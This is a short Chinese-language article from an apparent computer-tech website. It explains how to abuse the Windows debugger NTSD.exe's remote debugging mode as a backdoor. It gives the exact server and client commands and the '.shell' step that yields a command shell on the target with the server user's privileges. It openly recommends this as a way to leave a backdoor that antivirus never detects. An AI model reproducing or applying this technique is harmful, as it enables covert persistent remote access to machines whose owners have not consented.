微软的“后门”:NTSD.exe,的远程调试功能利用

来源:未知 责任编辑:责任编辑 发表时间:2013-11-15 19:50 点击:

1.远程终端上:ntsd -server tcp:port=端口 要调试的程序(可以任意,只要存在即可),例如:ntsd -server tcp:port=99 calc.exe,会新弹出个窗口,并监听刚才设置端口。


    2.本机运行:ntsd -remote tcp:server=IP,port=端口,例如:ntsd -remote tcp:server=192.168.1.1,port=99。会弹出一个窗口。如果参数填写正确的话,会连接上目标机器,会显示命令类似提示符的界面,同时 server 端(就是第一步监听的那个)会显示:0:000> COMPUTER etbar (tcp 192.168.1.3, port 99) connected at Fri May 06 13:49:59 2011,表示有人连接了,同时还显示连接的机器名,用户名,连接类型,IP地址,端口,时间等信息。


    3.输入:.shell,取得 shell,操作和 Cmd 完全一样,权限是服务端运行ntsd.exe的用户权限。


    又是个留后门的好方法,全免杀,而且永不被杀……

    这个其实是 NTSD.exe 的正常功能,远程调试功能,更多说明自己谷歌搜索,这是一个 windows 命令行下的调试工具,功能十分强大。

    发表评论
    请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
    用户名: 验证码:点击我更换图片
    最新评论 更多>>

    推荐热点

    • dos命令原来也能这样用?允许查找未知子目录指定文件
    •  windows的磁盘操作之八——格式化分区的思考
    • windows篇-第三章 安装和配置DNS服务器
    • windows篇-第二章 安装和配置Web服务器
    • windows篇-第一章 windows server 2008安装和简单配置
    •  windows server 2003断开远程之后自动注销用户
    • Windows服务器下用IIS Rewrite组件为IIS设置伪静态方法
    • Windows 2008 R2 SP1部署WSUS 3.0 SP2
    • windows 2008 rodc扩展

    快速直达

    操作系统导航

    LinuxWindows虚拟机
    网站首页 - 友情链接 - 网站地图 - TAG标签 - RSS订阅 - 内容搜索
    Copyright © 2008-2015 计算机技术学习交流网. 版权所有

    豫ICP备11007008号-1